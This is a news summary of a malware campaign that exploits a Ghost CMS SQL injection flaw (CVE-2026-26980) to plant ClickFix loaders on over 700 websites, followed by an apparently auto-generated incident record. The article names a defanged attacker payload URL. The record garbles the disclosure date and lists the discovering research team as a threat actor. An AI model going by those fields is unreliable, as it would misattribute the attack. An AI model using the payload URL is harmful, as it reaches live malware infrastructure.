Critical Ghost CMS Vulnerability Exploited in Large-Scale Malware Campaign
A severe SQL injection flaw in the Ghost content management system (CMS), tracked as CVE-2026-26980, has been exploited in a widespread cyberattack compromising over 700 websites, including platforms linked to Harvard University, the University of Oxford, and DuckDuckGo. The campaign, uncovered by Chinese cybersecurity firm QiAnXin’s XLab team, leverages unpatched Ghost installations to inject malicious JavaScript, enabling ClickFix malware attacks.
The vulnerability, disclosed and patched in February 2026 (Ghost version 6.19.1), carries a CVSS score of 9.4, reflecting its critical severity. It allows unauthenticated attackers to extract sensitive data including Admin API keys, user credentials, and authentication tokens via Ghost’s Content API. Once obtained, the Admin API key grants attackers the ability to modify published articles and embed malicious code without authorization.
Exploitation began almost immediately after the patch’s release, with a DLL file linked to the campaign compiled on February 16, 2026, the same day the fix was announced. The first malicious activity was detected on May 7, 2026, with hundreds of Ghost-powered sites compromised by early May. Victims span AI, blockchain, cybersecurity, fintech, media, SaaS, and higher education, though nearly half were personal blogs or independent sites.
Attackers injected two-stage JavaScript loaders into website articles, directing visitors to an external domain (clo4shara[.]xyz/11z77u3.php) to fetch additional payloads. The infrastructure used Adspect, a commercial cloaking service, to fingerprint visitors and selectively deliver malware, evading detection by automated scanners. QiAnXin noted that at least two threat groups are actively competing in these "poisoning operations," with some sites receiving multiple malicious code injections in a single day.
Despite notifications, most compromised sites failed to respond, leaving the campaign ongoing. The attack highlights the risks of delayed patching in widely used CMS platforms.
Source: https://thecyberexpress.com/cve-2026-26980-ghost-cms-vulnerability/
DuckDuckGo cybersecurity rating report: https://www.rankiteo.com/company/duck-duck-go
Harvard University cybersecurity rating report: https://www.rankiteo.com/company/harvard-university
Ghost cybersecurity rating report: https://www.rankiteo.com/company/ghost-foundation
"id": "DUCHARGHO1779798590",
"linkid": "duck-duck-go, harvard-university, ghost-foundation",
"type": "Cyber Attack",
"date": "5/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"{'affected_entities': [{'industry': 'Higher Education',
'name': 'Harvard University',
'size': 'Large',
'type': 'Educational Institution'},
{'industry': 'Higher Education',
'name': 'University of Oxford',
'size': 'Large',
'type': 'Educational Institution'},
{'industry': 'Search Engine/Privacy',
'name': 'DuckDuckGo',
'size': 'Large',
'type': 'Technology Company'},
{'industry': 'Various',
'size': 'Small',
'type': 'Personal Blogs/Independent Sites'},
{'industry': ['AI',
'Blockchain',
'Cybersecurity',
'Fintech',
'Media',
'SaaS'],
'type': 'Websites'}],
'attack_vector': 'Unpatched Ghost CMS installations, malicious JavaScript '
'injection',
'data_breach': {'data_exfiltration': 'Yes',
'personally_identifiable_information': 'Potential (user '
'credentials, '
'authentication '
'tokens)',
'sensitivity_of_data': 'High',
'type_of_data_compromised': ['Admin API keys',
'User credentials',
'Authentication tokens']},
'date_detected': '2026-05-07',
'date_publicly_disclosed': '2026-02-2026',
'description': 'A severe SQL injection flaw in the Ghost content management '
'system (CMS), tracked as CVE-2026-26980, has been exploited '
'in a widespread cyberattack compromising over 700 websites, '
'including platforms linked to Harvard University, the '
'University of Oxford, and DuckDuckGo. The campaign leverages '
'unpatched Ghost installations to inject malicious JavaScript, '
'enabling ClickFix malware attacks.',
'impact': {'brand_reputation_impact': 'High (affected prestigious '
'institutions and brands)',
'data_compromised': 'Admin API keys, user credentials, '
'authentication tokens',
'identity_theft_risk': 'High (PII exposure risk)',
'operational_impact': 'Malicious code injection into published '
'articles, unauthorized modifications',
'systems_affected': 'Over 700 Ghost-powered websites'},
'initial_access_broker': {'backdoors_established': 'Malicious JavaScript '
'injection',
'entry_point': 'Unpatched Ghost CMS '
'(CVE-2026-26980)',
'high_value_targets': ['Harvard University',
'University of Oxford',
'DuckDuckGo']},
'investigation_status': 'Ongoing',
'lessons_learned': 'Risks of delayed patching in widely used CMS platforms, '
'importance of timely vulnerability remediation, and the '
'need for enhanced monitoring of third-party integrations.',
'motivation': 'Data exfiltration, malware distribution, financial gain '
'(potential)',
'post_incident_analysis': {'corrective_actions': 'Patch management, enhanced '
'monitoring, security '
'audits, user education',
'root_causes': 'Unpatched Ghost CMS vulnerability '
'(CVE-2026-26980), delayed patching '
'by website administrators, lack of '
'monitoring for unauthorized '
'content modifications'},
'recommendations': ['Immediately patch Ghost CMS to version 6.19.1 or later',
'Monitor for unauthorized modifications to published '
'content',
'Implement behavioral WAF and enhanced monitoring for '
'malicious JavaScript injections',
'Conduct regular security audits of CMS platforms and '
'third-party integrations',
'Educate users on the risks of unpatched software'],
'references': [{'source': 'QiAnXin’s XLab team'}],
'response': {'remediation_measures': 'Patch Ghost CMS to version 6.19.1 or '
'later',
'third_party_assistance': 'QiAnXin’s XLab team (discovery and '
'analysis)'},
'threat_actor': ['QiAnXin’s XLab team (discoverers)',
'At least two competing threat groups'],
'title': 'Critical Ghost CMS Vulnerability Exploited in Large-Scale Malware '
'Campaign',
'type': 'SQL Injection, Malware Campaign',
'vulnerability_exploited': 'CVE-2026-26980 (SQL Injection in Ghost CMS)'}